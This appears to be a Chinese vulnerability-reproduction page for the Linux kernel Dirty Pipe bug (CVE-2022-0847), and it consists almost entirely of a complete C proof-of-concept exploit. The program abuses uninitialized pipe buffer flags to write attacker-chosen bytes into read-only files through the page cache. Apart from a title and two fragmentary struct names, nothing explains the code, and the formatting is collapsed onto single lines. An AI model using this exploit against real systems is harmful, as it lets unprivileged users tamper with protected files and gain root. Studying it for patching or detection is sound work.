Dirty Pipe(CVE-2022-0847)漏洞复现

struct pipe_bufferstruct pipe_inode_info

struct pipe_bufferPIPE_BUF_FLAG_CAN_MERGE

#define _GNU_SOURCE#include <unistd.h>#include <fcntl.h>#include <stdio.h>#include <stdlib.h>#include <string.h>#include <sys/stat.h>#include <sys/user.h>#ifndef PAGE_SIZE#define PAGE_SIZE 4096#endif/** * Create a pipe where all "bufs" on the pipe_inode_info ring have the * PIPE_BUF_FLAG_CAN_MERGE flag set. */static void prepare_pipe(int p[2]){  if (pipe(p)) abort();  const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);  static char buffer[4096];  /* fill the pipe completely; each pipe_buffer will now have     the PIPE_BUF_FLAG_CAN_MERGE flag */  for (unsigned r = pipe_size; r > 0;) {    unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;    write(p[1], buffer, n);    r -= n;  }  /* drain the pipe, freeing all pipe_buffer instances (but     leaving the flags initialized) */  for (unsigned r = pipe_size; r > 0;) {    unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;    read(p[0], buffer, n);    r -= n;  }  /* the pipe is now empty, and if somebody adds a new     pipe_buffer without initializing its "flags", the buffer     will be mergeable */}int main(int argc, char **argv){  if (argc != 4) {    fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATAn", argv[0]);    return EXIT_FAILURE;  }  /* dumb command-line argument parser */  const char *const path = argv[1];  loff_t offset = strtoul(argv[2], NULL, 0);  const char *const data = argv[3];  const size_t data_size = strlen(data);  if (offset % PAGE_SIZE == 0) {    fprintf(stderr, "Sorry, cannot start writing at a page boundaryn");    return EXIT_FAILURE;  }  const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;  const loff_t end_offset = offset + (loff_t)data_size;  if (end_offset > next_page) {    fprintf(stderr, "Sorry, cannot write across a page boundaryn");    return EXIT_FAILURE;  }  /* open the input file and validate the specified offset */  const int fd = open(path, O_RDONLY); // yes, read-only! :-)  if (fd < 0) {    perror("open failed");    return EXIT_FAILURE;  }  struct stat st;  if (fstat(fd, &st)) {    perror("stat failed");    return EXIT_FAILURE;  }  if (offset > st.st_size) {    fprintf(stderr, "Offset is not inside the filen");    return EXIT_FAILURE;  }  if (end_offset > st.st_size) {    fprintf(stderr, "Sorry, cannot enlarge the filen");    return EXIT_FAILURE;  }  /* create the pipe with all flags initialized with     PIPE_BUF_FLAG_CAN_MERGE */  int p[2];  prepare_pipe(p);  /* splice one byte from before the specified offset into the     pipe; this will add a reference to the page cache, but     since copy_page_to_iter_pipe() does not initialize the     "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */  --offset;  ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);  if (nbytes < 0) {    perror("splice failed");    return EXIT_FAILURE;  }  if (nbytes == 0) {    fprintf(stderr, "short splicen");    return EXIT_FAILURE;  }  /* the following write will not create a new pipe_buffer, but     will instead write into the page cache, because of the     PIPE_BUF_FLAG_CAN_MERGE flag */  nbytes = write(p[1], data, data_size);  if (nbytes < 0) {    perror("write failed");    return EXIT_FAILURE;  }  if ((size_t)nbytes < data_size) {    fprintf(stderr, "short writen");    return EXIT_FAILURE;  }  printf("It worked!n");  return EXIT_SUCCESS;}